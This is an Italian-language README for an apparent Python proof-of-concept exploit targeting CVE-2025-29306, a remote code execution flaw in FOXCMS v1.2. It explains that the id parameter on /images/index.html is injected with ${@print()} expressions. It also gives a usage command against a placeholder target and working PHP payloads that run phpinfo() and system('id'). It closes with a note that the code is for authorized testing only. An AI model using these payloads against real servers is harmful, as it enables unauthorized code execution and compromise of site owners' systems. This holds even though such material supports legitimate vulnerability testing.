
Python PoC per CVE-2025-29306, una RCE tramite iniezione di parametri in FOXCMS v1.2. Inietta codice PHP tramite il parametro id su /images/index.html per test di sicurezza autorizzati.
Questo repository contiene un PoC basato su Python per una vulnerabilità di Remote Code Execution (RCE) che colpisce FOXCMS v1.2, un sistema di gestione dei contenuti open-source cinese.
ID CVE: CVE-2025-29306
Interessa: FOXCMS v1.2
Tipo: Iniezione di Parametri di Servizio → Esecuzione di Codice
FOXCMS presenta un meccanismo insicuro di parsing dei parametri nel parametro id sull'endpoint /images/index.html. Ciò consente l'iniezione di payload tramite espressioni ${@print()}, portando all'esecuzione di codice PHP.
requestspip install requests
# Usage
python foxcms_poc.py http://target.com/images/index.html?id=
# The script uses payloads like:
${@print(phpinfo())}
${@print(system('id'))}
Questo codice è solo per scopi educativi e per test di sicurezza autorizzati. Non utilizzarlo su sistemi che non possiedi o per i quali non hai il permesso di testare.
Autore Inok009